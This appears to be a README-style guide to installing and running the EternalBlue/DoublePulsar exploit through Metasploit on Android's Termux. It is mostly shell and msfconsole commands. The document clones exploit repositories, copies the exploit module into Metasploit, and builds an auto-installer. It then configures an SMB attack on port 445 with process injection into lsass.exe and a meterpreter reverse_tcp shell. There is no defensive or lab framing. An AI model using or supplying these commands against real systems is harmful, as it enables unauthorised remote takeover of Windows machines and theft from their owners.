Installation commands:
-----------------------------------------------------------------------------------------------------------------
| pkg update && pkg upgrade                                                                                     |
| pkg install root-repo                                                                                         |
| termux-setup-storage                                                                                          |
| pkg install metasploit                                                                                        |
| pkg install git                                                                                               |
| git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit                                  |
| pkg install mlocate && pkg updatedb                                                                           |
| locate metasploit-framework                                                                                   |
| cd Eternalblue-Doublepulsar-Metasploit                                                                        |
| cp eternalblue_doublepulsar.rb /data/data/com.termux/files/usr/opt/metasploit-framework/modules/exploits/smb  |
| cd /data/data/com.termux/files/home                                                                           |
| mkdir .wine && cd .wine && mkdir drive_c                                                                      |
| msfconsole                                                                                                    |
-----------------------------------------------------------------------------------------------------------------

Auto installation commands:
-----------------------------------------------------------------------------------------------------------------
| pkg install git                                                                                               |
| git clone https://github.com/MasterTatu/Termux-metasploit-eternalblue-doublepulsar                            |
| cd Termux-metasploit-eternalblue-doublepulsar                                                                 |
| pkg install clang++                                                                                           |
| clang++ autoinstall.cpp -o auto && ./auto                                                                     |
-----------------------------------------------------------------------------------------------------------------
Usage:
-----------------------------------------------------------------------------------------------------------------
| use exploits/windows/smb/eternalblue_doublepulsar                                                             |
| set RHOST ......                                                                                              |
| set RPORT 445                                                                                                 |
| set LHOST ......                                                                                              |
| set LPORT 4444                                                                                                |
| set DOUBLEPULSARPATH /data/data/com.termux/files/home/Eternalblue-Doublepulsar-Metasploit/deps                |
| set ETERNALBLUEPATH /data/data/com.termux/files/home/Eternalblue-Doublepulsar-Metasploit/deps                 |
| set TARGETARCHITECTURE x86/x64                                                                                |
| set PROCESSINJECT lsass.exe / explorer.exe                                                                    |
| set WINEPATH /data/data/com.termux/files/home/.wine/drive_c/                                                  |
| set PAYLOAD windows/meterpreter/reverse_tcp / set PAYLOAD windows/x64/meterpreter/reverse_tcp                 |
| exploit                                                                                                       |
-----------------------------------------------------------------------------------------------------------------
